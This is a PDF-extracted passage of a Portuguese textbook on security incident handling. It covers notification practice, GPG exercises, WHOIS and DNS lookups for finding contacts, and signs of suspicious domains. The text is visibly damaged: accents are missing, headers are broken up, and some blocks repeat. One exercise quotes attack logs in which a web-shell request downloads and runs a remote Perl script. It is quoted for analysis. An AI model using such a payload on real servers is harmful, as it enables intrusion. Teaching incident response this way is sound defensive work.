Dando sequncia aos exemplos de notifcaes, apresentada uma notifcao de phishing
na fgura 5.10. Na referida notifcao est sendo reportado um servidor que est hospe-
dando um website falso com o intuito de roubar informaes dos usurios da instituio
fnanceira Banco do Brasil. Esse incidente foi identifcado internamente, atravs da anlise
dos spams recebidos pelos usurios. importante notar que a notifcao est copiando os
responsveis pela rede e tambm os demais envolvidos com a marca.
Figura 5.10
Notifcao de
incidente interno.
102

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
As notifcaes exibidas at agora demonstraram exemplos de como um CSIRT pode noti-
fcar as partes envolvidas com um evento de segurana. Agora, no processo reverso, onde
as notifcaes de incidentes so recebidas, tudo muito semelhante.
Um CSIRT pode receber notifcaes de entidades externas e tambm da sua prpria comu-
nidade de atuao. Todas as notifcaes recebidas passam por um fuxo de tratamento de
informaes previamente defnidos. Na fgura 5.11, por exemplo, ilustrado um possvel
fuxo de dados de uma notifcao recebida.
Instituio CSIRT
interno externo
resoluo resoluo
Internet
Toda notifcao recebida representada pelo envelope analisada pela equipe e direcio-
nada para que as aes cabveis sejam tomadas a fm de solucionar o incidente. Essa etapa
compreende interagir com as partes envolvidas e assegurar que o incidente foi solucionado.
Como resultado, o CSIRT pode encerrar o incidente ou ainda notifcar novas partes envol-
vidas em decorrncia dos novos fatos identifcados na investigao realizada.
Figura 5.11
Notifcao de
phishing.
Figura 5.12
Recebimento de
notifcaes de
incidentes.
103

C
a
p

t
u
l
o


5

-

A
s
p
e
c
t
o
s

o
p
e
r
a
c
i
o
n
a
i
s

d
a

r
e
s
p
o
s
t
a

a

i
n
c
i
d
e
n
t
e
s
Boas prticas para a notificao de incidentes de segurana
q 1 Quando reportar e-mails para outros pases, recomenda-se a utilizao do idioma
ingls. Mesmo em pases onde o ingls no a primeira lngua, os times nacionais
esto preparados para entender o idioma. Deve-se evitar o uso de tradutores
automticos (Google Translator, Yahoo Translator e Babelfsh). Esses corretores nem
sempre so efcientes no contexto tcnico e podem tornar a notifcao incompreen-
svel para o destinatrio;
1 Deixar evidente as informaes bsicas do incidente reportado. Por exemplo, ao reportar
uma pgina falsa, importante deixar a URL em questo visvel, ou seja, destacada do
texto. Dessa forma, um analista pode facilmente identifcar e avaliar o incidente;
1 O assunto da notifcao deve ser claro o sufciente para o analista inferir o contedo
reportado. Evitar assuntos genricos do tipo: pedido de ajuda, incidente de segu-
rana, ou ainda urgente. Em vez de assuntos genricos, dar preferncia a assuntos
tal como: acesso no autorizado, phishing em: XXXX;
1 O uso de templates bastante comum para notifcar incidentes de segurana.
Sabe-se, no entanto, que mensagens diretas e direcionadas so mais efetivas para
a resoluo de um incidente. Sendo assim, mesmo usando templates padronizados
para reportar incidentes, aconselha-se o uso de mensagens direcionadas e sucintas
em incidentes de maior impacto;
1 A resoluo de um incidente passa por uma colaborao entre equipes. Recomenda-
-se armazenar os contatos que foram efetivos e prestativos no processo de resoluo
de problemas, que podem ser teis em um momento de crise;
1 Para a troca de informaes via e-mail, preferir a utilizao de texto sem formatao.
Deve-se evitar enviar notifcaes em formato HTML ou ainda informaes contidas
em imagens (captura de tela).
Leitura recomendada:
1 Data Breach Notifcation Toolkit:
http://www.stonesoup.org/Meetings/0509/enter.pres/blair3.ppt
1 Data Incident Notifcation Templates:
http://www.educause.edu/ir/library/pdf/CSD4237.pdf
1 Internet Worm Propagation:
http://www.model.in.tum.de/um/courses/seminar/worm/WS0405/misslinger.pdf
1 NIST SP 800-61: Computer Security Incident Handling Guide:
http://csrc.nist.gov/publications/nistpubs/800-61/sp800-61.pdf
104

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
105

C
a
p

t
u
l
o


5

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

5
Roteiro de atividades 5
Atividade 5.1 Utilizando PGP
A utilizao de criptografa, conforme comentado, altamente recomendvel e muitas vezes
mandatria para a troca de informaes de incidentes de segurana. Nesta atividade vamos
usar o software GNUPG para realizar tarefas bsicas:
a. Criar uma chave PGP para ser utilizada no seu CSIRT.
O processo de criao de chaves totalmente interativo, para inici-lo, utilize o comando:
# gpg --gen-key
As chaves so criadas no diretrio ~/.gnupg/. Para listar as chaves, utilize o comando
a seguir:
1. # gpg --list-keys
b. Assinar um arquivo:
2. # gpg -s --clearsign arquivo.txt
c. Criptografando um arquivo:
3. # gpg --encrypt arquivo
d. Exportar a sua chave pblica para um arquivo:
4. # gpg --export -a csirt@csirt.com >chave-publica_CSIRT_A.txt
e. Importar uma chave pblica de outro grupo:
5. # gpg --import chave-publica_CSIRT_X.txt
6. # gpg --list-keys
f. Importar a chave pblica do CERT.br:
7. # wget http://www.cert.br/pgp/CERTbr.asc ; gpg -import CERTbr.asc
8. # gpg --import CERTbr.asc
g. Cifrar um arquivo com a chave pblica importada e encaminhar mensagem para o desti-
natrio para que ele possa recuper-la:
9. # gpg -r ID_CSIRT_X encrypt documento.txt
Comando utilizado:
106

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Atividade 5.2 PGP Web-of-Trust
Essa atividade tem o objetivo de ilustrar o conceito de rede de confana no contexto de
chaves PGP. Assim como exemplifcado, qualquer usurio pode criar uma chave imperso-
nando outra instituio ou usurio. Para isso, diferentes usurios podem assinar uma chave
pblica atestando a autenticidade da pessoa. Nessa atividade, vamos analisar a rede de
confana de uma determinada chave pblica. Para isso, siga as etapas:
1 Acesse o site do FIRT (http://www.frst.org/members/teams) e escolha uma chave PGP
para analisar;
1 Identifque o ID da chave pblica escolhida;
1 Acesse o website http://pgp.cs.uu.nl/ e identifque todas as chaves que assinaram a chave
pblica pesquisada.
Atividade 5.3 Notificao de incidentes
Discuta as vantagens e desvantagens de notifcar um incidente de segurana utilizando as
duas linhas de logs a seguir:
Log A:
2013-09-30 22:07:28 PST 20.20.20.20/2231-> xxx.xxx.xxx.xxx/22
Log B:
2013-09-30 22:07:28 PST 20.20.20.20/2231-> 30.30.30.30/22
Atividade 5.4 Identificar informaes relevantes em uma notificao recebida
Avalie a notifcao de incidente a seguir e responda os possveis desmembramentos do
incidente. Para isso, considere a sua abrangncia operacional:
1 Voc representar a universidade.exp.net.br;
1 Seu bloco de endereamento : 10.0.0.0/16
107

C
a
p

t
u
l
o


5

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

5
From: csirt@universidade.exp.net.br
To: csirt@esr.rnp.br
Subject: Ataque ao servidor web
Senhores,
Detectamos atravs de nossos sistemas de segurana que uma mquina de sua res-
ponsabilidade est buscando vulnerabilidades no nosso servidor web. Solicitamos
que investigue o incidente a seguir e tome as medidas cabveis.
10.10.10.10 - - [14/Nov/2014:08:50:43 -0200] GET +/forum2013/slides//images/docs/
morocanz.php?cmd=cd%20/tmp%20;wget%20http://website.com.xxx/p.log%20;%20
perl%20p.log%20;%20rm%20-rf%20p.log HTTP/1.1 404 7488 Mozilla/5.0 (Windows;
U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.1
10.10.10.10 - - [14/Nov/2014:12:57:19 -0200] GET /docs/papers/hnbr-frst2003.
pdf//images/docs/morocanz.php?rf HTTP/1.1 404 7488 Mozilla/5.0 (Windows; U;
Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.1
10.10.10.10 - - [14/Nov/2014:12:57:20 -0200] GET +/docs/papers//images/docs/
morocanz.php?cmd=cd%20/tmp%20;wget%20http://website.com.xxx/p.log%20;%20
perl%20p.log%20;%20rm%20-rf%20p.log HTTP/1.1 404 7488 Mozilla/5.0 (Windows;
U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.1
Atenciosamente,
CSIRT
a. Faa um resumo do incidente a seguir descrendo o ataque.
b. O incidente foi bem-sucedido? O atacante teve sucesso na sua investida? Por qu?
108

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
c. Esse incidente vai gerar uma notifcao externa?
109

C
a
p

t
u
l
o


6

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
6
Identificao de contatos
Identifcar as partes envolvidas no incidente; Utilizar diferentes ferramentas para
identifcar os responsveis; Conhecer diferentes tcnicas para investigao de contatos.
Diferena entre contatos de redes e contatos de domnios de redes; Boas prticas
no processo de identifcao de contatos.


Introduo
A identifcao de contato, ou seja, identifcar os responsveis envolvidos em um incidente
de segurana, uma etapa crucial no processo de resposta a incidentes.
q A habilidade de comunicar-se com as partes interessadas no processo possibilita com
que o CSIRT:
1 Troque informaes sobre a segurana do incidente em si;
1 Melhore o entendimento das atividades relacionadas ao comprometimento;
1 Identifque possveis novas vulnerabilidades;
1 Aprimore a segurana dos sistemas.
Identifcar os responsveis por uma instituio envolve investigar as diferentes informaes
relativas ao incidente de segurana. Sabe-se que toda informao pode ser til no processo
de anlise; no entanto, uma das tarefas fundamentais desempenhadas pelo CSIRT identi-
fcar informaes relevantes para conduzir a investigao. Nesse processo, so analisadas
informaes contidas pela prpria notifcao do incidente ou ainda nos dados identifcados
pela prpria equipe. Tais dados, reportados por outros administradores ou disponveis em
logs de ferramentas automatizadas de segurana, so essenciais para a rpida identifcao
dos contatos. Por exemplo, um endereo IP ou domnio de rede tende a revelar informa-
es sobre a origem dos ataques e tambm dados de outros sistemas afetados diretamente
relacionados com o incidente a ser investigado.
A etapa de identifcar contatos pode parecer simples, mas no deve ser subestimada. Muitas
vezes, identifcar o contato efetivo das partes envolvidas com o incidente pode ser dispen-
dioso. Nem sempre fcil encontrar informaes de contatos atualizados e equipes res-
ponsivas por trs de uma informao de contato. Isso se deve a diversos fatores, como por
exemplo, a prpria caracterstica dinmica das redes, onde constantemente ocorrem fuses
de empresa, aquisies de novos blocos de endereamentos e novos domnios.
o
b
j
e
t
i
v
o
s
c
o
n
c
e
i
t
o
s
110

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Diante disso, interessante que os CSIRTs estejam preparados para lidar com essas tarefas
conhecendo ferramentas e tcnicas que podem ser empregadas na busca de informaes
de contato.
q Cada time implementa uma sequncia de etapas para ser utilizada na obteno de
informaes de contato, como por exemplo:
1 Localizar contatos na prpria base de dados do CSIRT;
1 Consultar informaes no sistema WHOIS;
1 Consultar informaes adicionais (fontes pblicas e websites);
1 Infelizmente no existe roteiro pr-defnido para a obteno de contatos de forma
efetiva. Algumas etapas so comuns (consulta base WHOIS, por exemplo); no
entanto, existem outras etapas de um roteiro para obteno de contatos que so cus-
tomizadas. Nota-se que boa parte dos CSIRTs possui ferramentas customizadas para
localizao de informaes de contato, as quais compem informaes de diferentes
bases de contatos.
Alguns CSIRTs ainda optam por armazenar informaes de contatos em uma base de dados
interna. Tipicamente, um CSIRT possui um conjunto de contatos mais especfcos que
podem ser utilizados para notifcar incidentes fora do padro. Esses contatos mais espec-
fcos podem ser e-mails pessoais ou, ainda, e-mails de equipes de resposta a incidentes de
segundo nvel. Boa parte desses contatos so fruto de relacionamento e de cooperao com
outras entidades e CSIRTs. Cabe lembrar que o gerenciamento dos contatos armazenados
pelo CSIRT deve ser constantemente atualizado, pois muitas vezes essas informaes so
esquecidas e tornam-se invlidas.
Na sequncia, so apresentadas algumas tcnicas que podem ser teis no processo de resposta
a incidentes de segurana no que tange a identifcao das partes envolvidas em um incidente.
Identificao de contatos
q Um das primeiras etapas para identifcar os contatos dos responsveis analisar os
dados do incidente de segurana em busca de domnio e endereos IPs relacionados
com a atividade investigada. Uma vez identifcadas as informaes, pode-se:
Traduzir domnios de redes para endereos IP (domnio > IP)
q Existem diferentes formas para converter um IP em domnio de rede, desde ferramentas
online a ferramentas presentes em mltiplos Sistemas Operacionais. A seguir exempli-
fcado o uso da ferramenta nslookup para a traduo do nome:
$> nslookup www.rnp.br
Non-authoritative answer:
Name: www.rnp.br
Address: 200.130.35.4
111

C
a
p

t
u
l
o


6

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
Traduzir o endereo IP para domnios de redes (IP > domnio)
q O mesmo comando apresentado anteriormente pode ser utilizado para realizar o pro-
cesso inverso, ou seja, mapear o reverso de um endereo IP:
$> nslookup 200.130.35.4
Non-authoritative answer:
4.35.130.200.in-addr.arpa name = kerberos.na-df.rnp.br.
Nem todo endereo IP pode ter um nome de rede associado essa associao no uma
regra. Existem IPs que no esto associados a nenhum nome de rede. Esses endereos
que no possuem nomes associados, ou ainda que no possuem resoluo de nome de
reverso, geralmente tendem a demandar diferentes tcnicas no processo de investigao
dos responsveis, mas mesmo assim perfeitamente factvel obter informaes de
contato. Sendo assim, os comandos podem auxiliar na etapa de investigao prvia.
Por fm, fundamental lembrar que as informaes de resoluo de nomes so dinmicas.
Um determinado domnio pode ser traduzido para um endereo IP; no entanto, no existe
garantia de que essa informao permanea inalterada. Durante a investigao de um
incidente, um determinado domnio pode ter a sua resoluo alterada para outro IP. Isso
muito comum em casos de phishing, onde um domnio malicioso est associado a um IP, e
quando esse domnio malicioso bloqueado passa a ser associado a um IP de bloqueio, tal
como 127.0.0.1. Logo, em um processo de investigao e anlise de incidentes, no se pode
confiar apenas nos nomes de rede. Devem-se documentar todas as informaes, tal qual
foram observadas na etapa de investigao do incidente.
Servio WHOIS
q A maneira mais simples de localizar informaes de contatos consultar o servio de
WHOIS. O WHOIS uma base de dados distribuda e provida por entidades de registro
que permite obter informaes de recursos da internet, tais como:
1 Domnios de redes;
1 Endereamentos IPs;
1 Sistemas autnomos.
Essa base de dados (WHOIS) mantida pelos grandes operadores e detentores de registros
da internet.
q As informaes relativas a endereamento IP so mantidas por entidades regionais
denominadas Regional Internet Registries (RIRs). O mundo est dividido em cinco RIRs,
listadas na sequncia:
1 American Registry for Internet Numbers (ARIN): Canad, partes do Caribe e ilhas
do Atlntico Norte http://www.arin.net/whois
1 Asia Pacifc Network Information Centre (APNIC): Partes da sia e Regies da Oceania
http://www.apnic.net/search
1 Latin American and Caribbean Internet Addresses Registry (LACNIC): Amrica
Latina e regies do Caribe http://lacnic.net/cgi-bin/lacnic/whois
1 Rseaux IP Europens (RIPE): Europa, Oriente mdio e sia Central http://www.
ripe.net/perl/whois
1 Africa Regional Internet Registry (AFRINIC): frica e algumas regies do Oceano
ndico http://www.afrinic.net/cgi-bin/whois
112

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q A distribuio dos endereos IPs da internet realizada pela Internet Assigned Name
Authority (IANA), que por sua vez aloca os recursos para os RIRs, que gerenciam local-
mente as informaes repassadas e possuem autoridade para realizar realocaes
dentro de sua rea geogrfca.
Como, por exemplo, o LACNIC que um RIR pode repassar blocos de endereamento
para os National Internet Registry, tal como o Ncleo de Informao e Coordenao do
Ponto BR (NIC.br).
q Embora no exista uma especifcao padro relativa s informaes que devem ser
disponibilizas pelos servios de WHOIS, existe um subconjunto de informaes tpicas
que podem ser encontradas na maioria das bases de dados WHOIS, sendo:
1 Bloco de endereamento IP;
1 Informaes sobre o detentor do bloco;
1 Servidor DNS autoritrio;
1 Contato tcnico;
1 Contato para notifcar abusos;
1 Informaes sobre um WHOIS adicional.
A consulta a uma base de WHOIS pode ser realizada usando diferentes interfaces, entre elas,
interface web ou ainda por meio de aplicativos especfcos amplamente disponveis nos mais
diversos Sistemas Operacionais. Para isso, o WHOIS defne um protocolo prprio para consulta
de informaes de texto claro em uma base de dados. O protocolo especifcado pela RFC 812,
e posteriormente atualizado pela RFC 3912, utilizando a porta de comunicao 43/TCP.
As consultas para a base de dados do WHOIS podem ser realizadas pelo comando hom-
logo, ou seja, o comando whois posteriormente ilustrado. Tambm possvel encontrar
outras ferramentas online especializadas na consulta de informaes do servio WHOIS.
q Algumas ferramentas, por exemplo, conseguem seguir recursivamente as diferentes
bases de dados para identifcar informaes de contato. Servios para consulta online:
1 All Whois: http://www.allwhois.com/
1 Better Whois: http://betterwhois.com/
1 Geek Tools: http://www.geektools.com/whois.php
1 Cyberabuse WHOIS: http://www.fr2.cyberabuse.org/whois/?page=whois_server
1 Team Cymru WHOIS: http://asn.cymru.com/cgi-bin/whois.cgi
1 DNSstuf Tools Page: http://www.dnsstuf.com/pages/expert.htm
Na sequncia, so exemplifcadas com maior nvel de detalhamento as diferentes formas de
obter informaes dos principais recursos da internet. Inicialmente dados dos domnios de
rede, e posteriormente endereamento IP.
National Internet Registry
q Os National Internet Registry so organizaes abaixo dos RIRs (LACNIC, APNIC, ARIN,
RIPE e AFRINIC), cujo objetivo gerenciar e coordenar recursos de internet nacionalmente.
Existem poucos pases que gerenciam recursos de endereamento em nvel regional.
Na Amrica Latina, temos:
1 NIC Mxico: http://www.nic.mx/
113

C
a
p

t
u
l
o


6

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
q 1 NIC Brasil: http://www.nic.br/
1 NIC Chile: http://www.nic.cl/
Em outras regies, podemos citar:
1 China Internet Network Information Center (CNNIC);
1 Japan Network Information Center ( JPNIC);
1 Korea Internet & Security Agency (KRNIC);
1 Taiwan Network Information Center (TWNIC);
1 Vietnam Internet Network Information Center (VNNIC).
Essas entidades tambm so teis na identifcao dos responsveis por uma determinada
rede. Boa parte dos NIR disponibiliza sistema de WHOIS para consultar informaes de con-
tatos mais especfcos dos recursos de internet alocados pelo prprio.
Domnios de rede
q Um domnio de rede pode ser considerado um identifcador nico que pode ser
mapeado para um endereo de rede.
Por exemplo, o domnio www.exemplo.com.br pode ser mapeado, via sistema de Domain
Name System (DNS), para um endereo IP especfco.
A equipe de um CSIRT deve ter cincia de que um domnio de rede geralmente possui infor-
maes de contato diferente do respectivo endereo IP designado. Tipicamente, o contato
de um domnio de rede um administrador de sistemas, ao passo que o contato de um
endereo IP corresponde a um provedor de rede.
Como de conhecimento, os domnios de redes so alocados por diferentes instituies, ou
entidades provedoras de registro de domnio. No Brasil, temos o Registro.br, que respon-
svel pelo registro de nomes terminados com .br.
Um dos servios providos pelo Registro.br uma base de informao (WHOIS) com infor-
maes de recursos de endereamento e nomes de domnios alocados pela entidade.
q O Registro.br, por sua vez, disponibiliza um conjunto de informaes bem amplo na sua
base de dados WHOIS, compreendendo:
1 Domnio;
1 Instituio;
1 CPF ou CNPF;
1 Responsvel tcnico;
1 Responsvel administrativo;
1 Data de criao do domnio;
1 Data da ltima atualizao dos dados do domnio;
1 Data da expirao.
Todas as informaes disponibilizadas so pblicas e podem ser consultadas via interface
web ou servios baseados no protocolo WHOIS. A seguir, um exemplo de uma consulta pelo
domnio rnp.br utilizando a interface web do Registro.br:
114

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
% Copyright (c) Nic.br
% A utilizao dos dados abaixo permetida somente conforme
% descrito no Termo de Uso (http://registro.br/termo), sendo
% proibida a sua disiribuio, comercializao ou reproduo,
% em particular para fins publicitrios ou propsitos
%similares.
% 2013-11-07 21:15:48 (BRST -02:00)
dominio: rnp.br
titular: Associao Rede Nacional de Ensino e Pesquisa
documento: 003.508.097/0001-36
responsvel: Nelson Simes Silva
pais: BR
c-titular: RCO217
c-admin: NES
c-tcnico: FRK16
c-cobrana: RCO217
servidor DNS: teyr.na-cp.rnp.br 200.130.25.17 2001:12f0.3f:3::11
status DHS: 07/11/2013 AA
ltimo AA: 07/11/2013
servidor DNS: bellana.nc-rj.rnp.br 200.143.193.3 2001:12f0:3e:102::3
status DNS: 07/11/2013 AA
ltimo AA: 07/11/2013
servidor DNS: lua.na-df.rnp.br 200.130.77.69 2001:12f0:3d:102::45
status DNS: 07/11/2013 AA
ltimo AA: 07/11/2013
registro DS: 51124 RSA/SHA-1 4ED9FC74C63C99E52E2FC492517C73AEFAC316F2
status DS: 03/11/2013 DSOK
ltimo OK: 03/11/2013
criado: antes de 01/01/1995
alterado: 25/11/2011
status: publicado
Contato (ID): FRK16
nome: Flavio Rosa Kaatz
e-mail: flavio@rnp.br
criado: 07/05/2000
alterado: 18/11/2010
contato (ID): NES
nome: Nelson Simes
e-mail: nelson@na-df.rnp.br
criado: 18/12/1997
alterado: 28/04/2009
Contato (ID): RCO217
nome: RNP - Centro de Engenharia e Operaes
e-mail: registro@rnp.br
criado: 06/04/2006
alterado: 10/01/2013
% Problemas de seguranga e spam tambm devem ser reportados ao
% cert.br, http://cert.br/, respectivamente para cert@cert.br
% e mail-abuse@cert.br
%
% whois.registro.br aceita somente consultas diretas. Tinos
% de consultas so: dominio (.br), titular (entidade),
% ticket, provedor, contato (ID), bloco CIDR, IP e ASN.
115

C
a
p

t
u
l
o


6

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
% Copyright (c) Nic.br
% A utilizao dos dados abaixo permetida somente conforme
% descrito no Termo de Uso (http://registro.br/termo), sendo
% proibida a sua disiribuio, comercializao ou reproduo,
% em particular para fins publicitrios ou propsitos
%similares.
% 2013-11-07 21:15:48 (BRST -02:00)
dominio: rnp.br
titular: Associao Rede Nacional de Ensino e Pesquisa
documento: 003.508.097/0001-36
responsvel: Nelson Simes Silva
pais: BR
c-titular: RCO217
c-admin: NES
c-tcnico: FRK16
c-cobrana: RCO217
servidor DNS: teyr.na-cp.rnp.br 200.130.25.17 2001:12f0.3f:3::11
status DHS: 07/11/2013 AA
ltimo AA: 07/11/2013
servidor DNS: bellana.nc-rj.rnp.br 200.143.193.3 2001:12f0:3e:102::3
status DNS: 07/11/2013 AA
ltimo AA: 07/11/2013
servidor DNS: lua.na-df.rnp.br 200.130.77.69 2001:12f0:3d:102::45
status DNS: 07/11/2013 AA
ltimo AA: 07/11/2013
registro DS: 51124 RSA/SHA-1 4ED9FC74C63C99E52E2FC492517C73AEFAC316F2
status DS: 03/11/2013 DSOK
ltimo OK: 03/11/2013
criado: antes de 01/01/1995
alterado: 25/11/2011
status: publicado
Contato (ID): FRK16
nome: Flavio Rosa Kaatz
e-mail: flavio@rnp.br
criado: 07/05/2000
alterado: 18/11/2010
contato (ID): NES
nome: Nelson Simes
e-mail: nelson@na-df.rnp.br
criado: 18/12/1997
alterado: 28/04/2009
Contato (ID): RCO217
nome: RNP - Centro de Engenharia e Operaes
e-mail: registro@rnp.br
criado: 06/04/2006
alterado: 10/01/2013
% Problemas de seguranga e spam tambm devem ser reportados ao
% cert.br, http://cert.br/, respectivamente para cert@cert.br
% e mail-abuse@cert.br
%
% whois.registro.br aceita somente consultas diretas. Tinos
% de consultas so: dominio (.br), titular (entidade),
% ticket, provedor, contato (ID), bloco CIDR, IP e ASN.
As irregularidades encontradas em domnios registrados pelo Registro.br podem ser
denunciadas para: hostmaster@resgistro.br ou http://registro.br/contate.html
Atividade 1:
Como pode ser observado na Figura 6.1, possvel identifcar informaes que podem ser
relevantes para o processo de resposta a incidentes, tais como:
1 Contato administrativo: nelson@na-df.rnp.br;
1 Contato tcnico: favio@rnp.br.
Alm das informaes de contato, os dados disponibilizados pelo WHOIS permitem que sejam
realizadas certas anlises.
q possvel correlacionar informaes das entidades e at mesmo identifcar domnios
suspeitos. Algumas caractersticas que podem revelar domnios suspeitos so:
1 Domnio foi criado ou atualizado recentemente. A maioria dos domnios no atuali-
zada de forma requente;
1 O domnio escrito de maneira muito similar a um domnio j conhecido;
1 Domnio inteiramente gerado por letras e nmeros aleatrios. Pode ser um domnio
gerado por malwares com o objetivo exclusivo de evitar a deteco de um comprome-
timento (DGA Domain Generation Algorithm);
1 Informaes dos registradores ou de contato ausentes;
1 O domnio est listado em algumas listas de bloqueio ou est associado a atividades
maliciosas (buscadores).
O servio de WHOIS mantido pelo Registro.br, permite consultar informaes usando
diferentes campos da base de dado, tal como o CPF/CNPF da entidade. Para isso, utiliza-
-se a seguinte sintaxe:
whois -h whois.registro.br CPF/CNPF
Esse tipo de consulta til para correlacionar informaes de registro. Uma simples consulta,
como exemplifcado, pode revelar todos os domnios registrados por uma nica entidade.
A consulta a seguir ilustra uma entidade que possui apenas quatro domnios registrados.
owner: NOME SOBRENOME
ownerid: XXX.XXX.XXX-XX
Figura 6.1
Consultando
informaes do
domnio rnp.br
via interface do
Registro.br.
116

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q owner-c: XXXXXXX
created: 20151217
created: 20151217
domain: babcobradesco.com.br
domain: bancobradeaco.com.br
domain: calxa.gov.br
e-mail: reidomalware@terradonunca.xxx
Como ilustrado, todos os domnios registrados so domnios suspeitos. Afnal, so domnios
criados recentemente e com grafia similar de instituies fnanceiras conhecidas. Utilizar
essas informaes de contato para um domnio suspeito no recomendado. Afnal, as
informaes de contatos foram providas pelos prprios fraudados e, portanto, podem ser
falsas. No exemplo, o contato da entidade para denunciar abusos relacionados com os
domnios o endereo de e-mail: reidomalware@terradonunca.xxx. Logo, enviar uma
notifcao para o responsvel da entidade servir apenas para notifcar o atacante de que
suas atividades foram identifcadas.
Exerccio de fixao e
Encontre todos os domnios que foram registrados pela mesma entidade que registrou o
domnio rnp.br.
Endereamento IP
A equipe do CSIRT deve estar preparada para lidar com as informaes providas pelo ende-
reamento de uma instituio. Obviamente, o primeiro passo identifcar corretamente o
endereo de origem dos ataques, o que pode requerer um esforo considervel por parte
da equipe. Em alguns incidentes os atacantes tomam certos cuidados para acobertar a sua
origem. Assumindo que o endereo de origem tenha sido determinado, este pode ser utili-
zado para identifcar os responsveis.
q Os responsveis pelo endereamento IP so instituies que efetivamente passam por
um processo de solicitao de blocos junto a um RIR responsvel. Grande parte das
instituies, no entanto, utiliza endereamento sublocado por um provedor de acesso
internet (ISP).
Por exemplo, muitas instituies conectadas na RNP recebem um bloco de endereamento
diretamente da RNP. No entanto, esse endereamento continua sendo de responsabilidade
da RNP, afnal, foi a prpria RNP que solicitou o endereamento ao RIR local (Lacnic).
Durante uma investigao, muito comum encontrar dados de um provedor de acesso
quando se consulta a base WHOIS por um endereamento IP de uma determinada insti-
117

C
a
p

t
u
l
o


6

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
tuio. Essas informaes de contato podem ser efetivas, afnal, muitos provedores de rede
implementam mecanismos para receber solicitaes e responder incidentes de segurana.
Por outro lado, alguns provedores so responsveis por uma grande quantidade de blocos
de endereamento e no escalam o volume de solicitaes referentes ao processo de res-
posta a incidentes.
q O sistema de WHOIS tambm disponibiliza informaes de alocao IP, o que inclui infor-
maes de contato (endereos de e-mail e nome dos responsveis).
importante notar que o conjunto de informaes de alocao de IP disponibilizado pelo
WHOIS ligeiramente diferente das informaes de um nome de rede (vide fgura 6.1 versus
fgura 6.2).
% Copyright (4) Nic.br
% A utilizao dos dados abaixo permitida somente conforme
% descrito no Termo de Uso (http://registro.br/termo), sendo
% proibida a sua distribuio, comercializao ou reproduo,
% em particular para fins publicitrios ou propsitos similares.
% 2013-11-07 21:39:26 (BRST -02:00)
inetnum: 200.130/16
asn: AS1916
cabusos: SIC128
titular: Associao Rede Nacional de Ensino e Pesquisa
documento: 003.508.097/0001-36
responsvel: Nelson Simes Silva
pas: BR
c-titular: RC0217
c-tcnico: RC0217
inetrev: 200.130.35/24
servidor DNS: lua.na-df.rnp.br
status DNS: 07/11/2013 AA
ultimo AA: 07/11/2013
servidor DNS: teyr.na-cp.rnp.br
status DOS: 07/11/2013 AA
ltimo AA: 07/11/2013
servidor DNS: bellana.nc-rj.rnp.br
status DNS: 07/11/2013 AA
ltimo AA: 07/11/2013
criado: 15/02/2000
alterado: 07/03/2013
Contato (ID): RC0217
nome: RNP - Centro de Engenharia e Operaes
e-mail: registro@rnp.br
criado: 06/04/2006
alterado: 10/01/2013
Contato (ID): SIC128
nome: Security Incidents Response Center
e-mail: cais@cais.rnp.br
criado: 17/04/2002
alterado: 09/03/2005
% Problemas de seguranga e spam tamben devem ser reportados ao
% cert.br, http://cert.br/, respectivamente para cert@cert.br
% e mail-abuse@cert.br
%
% whois.registro.br aceita somente consultas diretas. Tipos
% de consultas so: dominio (.br), titular (entidade),
% ticket, provedor, contato (ID), blow CIDR, IP e ASN.
118

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
% Copyright (4) Nic.br
% A utilizao dos dados abaixo permitida somente conforme
% descrito no Termo de Uso (http://registro.br/termo), sendo
% proibida a sua distribuio, comercializao ou reproduo,
% em particular para fins publicitrios ou propsitos similares.
% 2013-11-07 21:39:26 (BRST -02:00)
inetnum: 200.130/16
asn: AS1916
cabusos: SIC128
titular: Associao Rede Nacional de Ensino e Pesquisa
documento: 003.508.097/0001-36
responsvel: Nelson Simes Silva
pas: BR
c-titular: RC0217
c-tcnico: RC0217
inetrev: 200.130.35/24
servidor DNS: lua.na-df.rnp.br
status DNS: 07/11/2013 AA
ultimo AA: 07/11/2013
servidor DNS: teyr.na-cp.rnp.br
status DOS: 07/11/2013 AA
ltimo AA: 07/11/2013
servidor DNS: bellana.nc-rj.rnp.br
status DNS: 07/11/2013 AA
ltimo AA: 07/11/2013
criado: 15/02/2000
alterado: 07/03/2013
Contato (ID): RC0217
nome: RNP - Centro de Engenharia e Operaes
e-mail: registro@rnp.br
criado: 06/04/2006
alterado: 10/01/2013
Contato (ID): SIC128
nome: Security Incidents Response Center
e-mail: cais@cais.rnp.br
criado: 17/04/2002
alterado: 09/03/2005
% Problemas de seguranga e spam tamben devem ser reportados ao
% cert.br, http://cert.br/, respectivamente para cert@cert.br
% e mail-abuse@cert.br
%
% whois.registro.br aceita somente consultas diretas. Tipos
